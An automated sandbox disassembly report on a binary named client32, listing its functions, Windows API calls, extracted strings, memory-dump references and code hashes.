                                                                              • Opcode Fuzzy Hash: e3234517993a23a489bcd726e27309146a97354540acbce9dede09c4332e6aa4
                                                                              • Instruction Fuzzy Hash: CDF0A03A781225A3E51912AABD58B9ABB5C9BC1A7EF150230F929D6DC0DB50C50082B5
                                                                              Function 11031F30 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • wsprintfA.USER32 ref: 11031FE6
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                              • String ID: %s%s.bin$134349$clientinv.cpp$m_pDoInv == NULL
                                                                              • API String ID: 4180936305-3984113849
                                                                              • Opcode ID: 1cb657f4e915e2d1e23f9df1b2d29e1dc20b61536471740f5e16ca5fcb139327
                                                                              • Instruction ID: 4b30c984cb9feb044c1d7ab8c0844ab34c920fbc261825ed793c706054f3ad77
                                                                              • Opcode Fuzzy Hash: 1cb657f4e915e2d1e23f9df1b2d29e1dc20b61536471740f5e16ca5fcb139327
                                                                              • Instruction Fuzzy Hash: D82190B5F00705AFD710CF65CC41BAAB7F4EB88758F10853DE86697681EB35A8008B51
                                                                              Function 11145240 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(11145918,00000000,?,11145918,00000000), ref: 1114525C
                                                                              • __strdup.LIBCMT ref: 11145277
                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                • Part of subcall function 11145240: _free.LIBCMT ref: 1114529E
                                                                              • _free.LIBCMT ref: 111452AC
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • CreateDirectoryA.KERNEL32(11145918,00000000,?,?,?,11145918,00000000), ref: 111452B7
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$AttributesCreateDirectoryErrorFileFreeHeapLast__strdup_strrchr
                                                                              • String ID:
                                                                              • API String ID: 398584587-0
                                                                              • Opcode ID: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
                                                                              • Instruction ID: a914e2cea8ad1481f503ba01f1d1a08edacf548165b8a11fd341c03149d2e1b0
                                                                              • Opcode Fuzzy Hash: 0f4bda93c2fa95a79c6cfec15824fc43f5b70deef06045cf9c901e7bc6b82896
                                                                              • Instruction Fuzzy Hash: 9301D276A04216ABF34115BD6D01FABBB8C8BD2A78F240173F84DD6A81E752E41681A2
                                                                              Function 1100EE20 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 1100EE52
                                                                                • Part of subcall function 111616DA: _setlocale.LIBCMT ref: 111616EC
                                                                              • _free.LIBCMT ref: 1100EE64
                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                              • _free.LIBCMT ref: 1100EE77
                                                                              • _free.LIBCMT ref: 1100EE8A
                                                                              • _free.LIBCMT ref: 1100EE9D
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                              • String ID:
                                                                              • API String ID: 3515823920-0
                                                                              • Opcode ID: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                              • Instruction ID: a44a88996e3d62c283fa82fd04d5e1258298656dbf2da44853d36c331dab430a
                                                                              • Opcode Fuzzy Hash: ed7eb8e9888c5118949983cd0268dd79b6cba560ecac2a4a446fb5dc8afa845e
                                                                              • Instruction Fuzzy Hash: 9511B2F2D046559BE720CF99D800A5BFBECEB50764F144A2AE49AD3640E7B2F904CA51
                                                                              Function 111464E0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111457A0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1111025B), ref: 1114584E
                                                                                • Part of subcall function 111457A0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                              • wsprintfA.USER32 ref: 1114650E
                                                                              • wsprintfA.USER32 ref: 11146524
                                                                                • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,75A78400,?), ref: 11143E97
                                                                                • Part of subcall function 11143E00: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                                • Part of subcall function 11143E00: FindCloseChangeNotification.KERNEL32(00000000), ref: 11143EBF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$CreateFolderPathwsprintf$ChangeCloseFindModuleNameNotification
                                                                              • String ID: %sNSA.LIC$%sNSM.LIC$NSM.LIC
                                                                              • API String ID: 1400454717-2600120591
                                                                              • Opcode ID: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
                                                                              • Instruction ID: d6aa3785d543843f1191885663c1f1b2da884e9fda22ce0040deef08ed208be3
                                                                              • Opcode Fuzzy Hash: b80d813afa46409255703ba7a7584a715aa6e7e8051bc230ff80af9931e0e18b
                                                                              • Instruction Fuzzy Hash: 7B01B5BA90122DA6CB10DBB09D41FDEF77CCB1460DF5005A5E8099A540EE60BE44DBD1
                                                                              Function 110F4B70 Relevance: 7.6, APIs: 5, Instructions: 50windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoInitialize.OLE32(00000000), ref: 110F4B8A
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110F4BAA
                                                                              • TranslateMessage.USER32(?), ref: 110F4BC4
                                                                              • DispatchMessageA.USER32(?), ref: 110F4BCA
                                                                              • CoUninitialize.OLE32 ref: 110F4BE6
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$DispatchInitializeTranslateUninitialize
                                                                              • String ID:
                                                                              • API String ID: 3550192930-0
                                                                              • Opcode ID: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                              • Instruction ID: c6f08b4013ced19d6869e69a0d946a3ee91e256cb2334e467ebd10f862add052
                                                                              • Opcode Fuzzy Hash: cc0c84c49c7e2416c752fb198c95613c6e3beb4d5de04bc6f877ef0d92a8c20d
                                                                              • Instruction Fuzzy Hash: A301CC35D0131E9BEB24DAA0DD85F99B3F8AF48719F0002AAE915E2181E774E5048B61
                                                                              Function 11143E00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92fileCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1111025B,75A78400,?), ref: 11143E97
                                                                              • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 11143EB7
                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 11143EBF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFile$ChangeCloseFindNotification
                                                                              • String ID: "
                                                                              • API String ID: 353575653-123907689
                                                                              • Opcode ID: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                              • Instruction ID: 3d5505e67506a11152adc20893aebb2e29c51f354ea5d43c8ad60c1cab3f6bda
                                                                              • Opcode Fuzzy Hash: 7a1e0e4b99865e682fb8aefe1b378640ee8558a614cdda32459534f13f8ca753
                                                                              • Instruction Fuzzy Hash: 5921BB31A092B9AFE332CE38DD54BD9BB989B42B14F3002E0E4D5AB5C1DBB19948C750
                                                                              Function 1102D830 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • SetEvent.KERNEL32(?,Client,DisableGeolocation,00000000,00000000,EE49F673,75922EE0,?,00000000,111821CB,000000FF,?,11030776,UseIPC,00000001,00000000), ref: 1102D8E7
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EDC3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 1102D8AA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Event$Create$__wcstoi64_malloc_memsetwsprintf
                                                                              • String ID: Client$DisableGeolocation
                                                                              • API String ID: 3315423714-4166767992
                                                                              • Opcode ID: 158f0e376808450741e0700ac0c024a58049640d461096dac0e4dc733de99837
                                                                              • Instruction ID: cbdab4fc78c667aa17d7f52ea236f8f509ff794b1425e8be210dc820fee18f51
                                                                              • Opcode Fuzzy Hash: 158f0e376808450741e0700ac0c024a58049640d461096dac0e4dc733de99837
                                                                              • Instruction Fuzzy Hash: 4921D374B41365AFE312CFA4CD41FA9F7A4E704B08F10066AF925AB7C4D7B5B8008B88
                                                                              Function 11027810 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102783A
                                                                                • Part of subcall function 110CD940: EnterCriticalSection.KERNEL32(00000000,00000000,75A73760,00000000,75A8A1D0,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
                                                                                • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CD988
                                                                                • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CD99A
                                                                                • Part of subcall function 110CD940: LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
                                                                              • TranslateMessage.USER32(?), ref: 11027850
                                                                              • DispatchMessageA.USER32(?), ref: 11027856
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                              • String ID: Exit Msgloop, quit=%d
                                                                              • API String ID: 3212272093-2210386016
                                                                              • Opcode ID: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
                                                                              • Instruction ID: 817b53cccd486bf52806c908fc33d3d0e945c232de97a35441108a60357cf637
                                                                              • Opcode Fuzzy Hash: 1e7707140bc2ef53bb668a28125e94940fa22640bbb246be592d1b9c462dd20f
                                                                              • Instruction Fuzzy Hash: 4C01FC76E8222A66E704DBE59C81FABF7AC9754B08F8040B5EA1493185E7A4B005C7E5
                                                                              Function 110179E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 110179ED
                                                                                • Part of subcall function 110178F0: WaitForSingleObject.KERNEL32(0000033C,000000FF), ref: 1101792C
                                                                                • Part of subcall function 110178F0: CoInitialize.OLE32(00000000), ref: 11017935
                                                                                • Part of subcall function 110178F0: _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101795C
                                                                                • Part of subcall function 110178F0: CoUninitialize.OLE32 ref: 110179C0
                                                                                • Part of subcall function 11017810: WaitForSingleObject.KERNEL32(0000033C,000000FF), ref: 11017842
                                                                                • Part of subcall function 11017810: CoInitialize.OLE32(00000000), ref: 1101784B
                                                                                • Part of subcall function 11017810: _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017872
                                                                                • Part of subcall function 11017810: CoUninitialize.OLE32 ref: 110178D0
                                                                              • SetEvent.KERNEL32(0000033C), ref: 11017A0D
                                                                              • GetTickCount.KERNEL32 ref: 11017A13
                                                                              Strings
                                                                              • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 11017A1D
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountInitializeObjectSingleStringTickUninitializeW@16Wait$Event
                                                                              • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                              • API String ID: 3804766296-4122679463
                                                                              • Opcode ID: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                              • Instruction ID: 40d604bc36e6f054513ad574895ebf983a142e9fcea0f5d6417744b2b8156d0d
                                                                              • Opcode Fuzzy Hash: 610e40d61194c34f9e635cc577eb4e6ba02d92eb7ed74a53a25a0e307046be88
                                                                              • Instruction Fuzzy Hash: 74F0A0B6E8021C6FE700DBF99D89E6EB79CDB44318B100436E914C7201E9A2BC1187A1
                                                                              Function 6EEF4FB0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6EEF4FC4
                                                                              • K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6EEF8E0D,00000000,?,6EEF8E0D,00000000,?,00000FA0,?), ref: 6EEF4FE4
                                                                              • SetLastError.KERNEL32(00000078,00000000,?,6EEF8E0D,00000000,?,00000FA0,?), ref: 6EEF4FED
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
